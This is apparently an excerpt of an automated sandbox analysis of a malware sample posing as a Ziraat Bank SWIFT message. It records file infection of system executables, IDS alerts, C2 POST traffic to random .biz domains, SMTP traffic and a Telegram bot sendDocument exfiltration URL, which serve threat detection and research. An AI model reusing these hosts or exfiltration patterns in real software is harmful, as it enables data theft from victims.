                          Source: Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ALG.pdb source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr

                          Spreading

                          barindex
                          Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_000C6CA9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_000C60DD
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_000C63F9
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CF56F FindFirstFileW,FindClose,0_2_000CF56F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_000CF5FA
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D1B2F
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000CEB60
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000D1C8A
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_000D1F94
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00906CA9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_009060DD
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_009063F9
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0090F5FA
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090F56F FindFirstFileW,FindClose,2_2_0090F56F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00911B2F
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0090EB60
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00911C8A
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeCode function: 2_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00911F94
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeCode function: 4x nop then jmp 00FD7394h11_2_00FD718D
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeCode function: 4x nop then jmp 00FD78DCh11_2_00FD767F
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00FD7E60
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 4x nop then jmp 02839B39h12_2_02839888
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 4x nop then jmp 0283A262h12_2_02839E48
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 4x nop then jmp 0283A262h12_2_0283A18F
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeCode function: 4x nop then jmp 0283A262h12_2_02839E38
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 0654BCBDh20_2_0654BA40

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49753 -> 54.244.188.177:80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.244.188.177 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.141.10.107 80
                          Source: Yara matchFile source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
                          Source: global trafficTCP traffic: 192.168.2.7:49705 -> 51.195.88.199:587
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: api.ipify.org
                          Source: unknownDNS query: name: api.ipify.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49745
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49738
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49738
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49745
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
                          Source: global trafficTCP traffic: 192.168.2.7:49705 -> 51.195.88.199:587
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: POST /vnpplpufavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                          Source: global trafficHTTP traffic detected: POST /kokmvod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                          Source: global trafficHTTP traffic detected: POST /yqmdwhskkjhif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeCode function: 0_2_000D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_000D4EB5
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                          Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                          Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                          Source: unknownHTTP traffic detected: POST /vnpplpufavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
                          Source: svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                          Source: svchost.exe, 00000022.00000003.1482948016.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575610744.0000000003280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vnpplpufavm
                          Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/yqmdwhskkjhif
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: server02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                          Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drString found in binary or memory: http://checkip.dyndns.org/q
                          Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                          Source: powershell.exe, 0000000F.00000002.1374308109.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                          Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cvgrf.biz/
                          Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                          Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                          Source: server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                          Source: server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                          Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                          Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: server02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 0000000F.00000002.1388691557.00000000081E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c)
                          Source: powershell.exe, 0000000F.00000002.1388691557.000000000823F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                          Source: neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.
                          Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://account.dyn.com/
                          Source: powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                          Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                          Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                          Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.drString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                          Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
